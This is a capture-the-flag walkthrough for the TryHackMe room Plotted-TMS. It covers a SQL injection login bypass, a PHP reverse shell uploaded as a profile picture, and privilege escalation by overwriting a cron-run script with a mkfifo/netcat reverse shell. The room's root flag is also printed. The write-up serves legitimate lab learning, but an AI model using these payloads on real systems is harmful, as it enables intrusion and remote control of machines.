Plotted-TMS is an easy room but Everything here is plotted! Hacking a Traffic Offense Management System.
First let’s scan the IP and find some information to work.
Eumerate , enumerate enumerate
Detect open ports:
nmap -sC -sV plotted.thm
After running nmap we detect three open ports 22-80-445, if you pay atention the port 445 is not a Samba server but an HTTP server running Apache.
At this point we have:
- 1 SSH Server (22)
- 2 HTTP Servers (80-445)
Both webservers show the Apache default webpage, its time to enumerate the webserver and find some juice.
Find folders and files on Webservers
Port 80 has nothing, you can check on next image.
We have another port to investigate, port 445.
Great we found a Traffic Offense Management System webapp to investigate and a link to the login system.
Great we have a PHP login page, here I ‘ve try the common admin:admin but it fails. So its time to sqli, after a few manually tests I am In!
admin' or 1+1--'
Cheking the profile page is possible to upload a profile image, or maybe a reverse shell? 😀
You can use sqlmap the usename parameter is vulnerable.
Upload a PHP reverse shell into profile picture and open a netcat listener on port 1234, open the image and you have a shell.
Here I describe two options, using netcat or msfconsole, usually I use msfconsole to be able to execute other procedures on the remote system and to be more easy to upgrade to a metrepeter shell.
msfconsole -q -x "use multi/handler; set payload generic/shell_reverse_tcp; set lhost 10.8.154.49; set lport 1234; exploit"
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set lhost 10.10.181.46 lhost => 10.10.181.46 msf5 exploit(multi/handler) > set lport 1234 lport => 1234 msf5 exploit(multi/handler) > run
nc -lnp 1234
Stabilize the shell:
python3 -c "import pty;pty.spawn('/bin/bash')"
Now is time to escalate our priviliges, I will run Linpeas and check the output
And lianpeas found our entry point, a cron job running a script as plot_admin.
Lets verify our permissions on that folder.
ls -la /var/www/
The scripts folder is owned by our user/group and is great we can create stuff inside or manipulate whats inside.
ls -la /var/www/scripts
As we can see we have a script owned by user plot_admin.
Let’s think a little bit.
We are the owners of a folder and someone create a script inside – do we have a permissions to write into that script?
Check the cronjob output it tell us it will be running as plot_admin user. So?
If we change the content of the script to a bash reverse shell it will be executed as plot_admin user.
mv /var/www/scripts/backup.sh /var/www/scripts/backup_rfs.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.44.169 4444>/tmp/f
nc -lp 1234
chmod 777 /var/www/scripts/backup.sh
TryHackMe Plotted-TMS PWNED
doas -u root openssl enc -in /root/root.txt
doas -u root openssl enc -in /root/root.txt Congratulations on completing this room! 53f85e-RFS-040a9bdcab Hope you enjoyed the journey! Do let me know if you have any ideas/suggestions for future rooms. -sa.infinity8888